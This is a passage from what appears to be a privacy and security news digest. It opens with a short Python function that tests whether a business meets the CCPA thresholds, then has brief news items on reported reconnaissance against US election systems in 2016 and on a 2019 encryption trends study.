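                 ca_residents_data_traded: int,
                 pct_revenue_from_selling_data: float) -> bool:
    """True if a business meets at least one CCPA threshold criterion."""
    if not for_profit:  # e.g., non-profit educational institutions are out of scope
        return False
    return (annual_revenue_usd > 25_000_000
            or ca_residents_data_traded > 50_000
            or pct_revenue_from_selling_data > 50.0)

# A hypothetical for-profit OPM provider: modest revenue, but it handles
# data on 80,000 California residents a year, so the CCPA applies.
print(ccpa_applies(True, 12_000_000, 80_000, 10.0))  # True

Note that a service provider can also fall under the CCPA indirectly, by processing consumer information on behalf of a business that meets these thresholds, even if the provider itself meets none of them.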

Government

US – Hackers Targeted Election Systems in All 50 States in 2016

A Joint Intelligence Bulletin issued by the US Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) to state and local authorities said that hackers targeted election systems in all 50 states during the 2016 election cycle. The bulletin says that “the FBI and DHS assess that Russian government cyber actors probably conducted research and reconnaissance against all US states’ election networks leading up to the 2016 Presidential elections.” [arstechnica.com: DHS, FBI say election systems in all 50 states were targeted in 2016]

Encryption

US – Encryption Use Increases to Address Compliance Requirements

Organizations’ use of trusted cryptography to protect applications and sensitive information is at an all-time high. According to the 2019 Global Encryption Trends Study from nCipher Security and the Ponemon Institute, 45% of respondents this year say their organization has an overall encryption plan applied consistently across the entire enterprise, with a further 42% having a limited encryption plan or strategy that is applied to certain applications and data types [see PR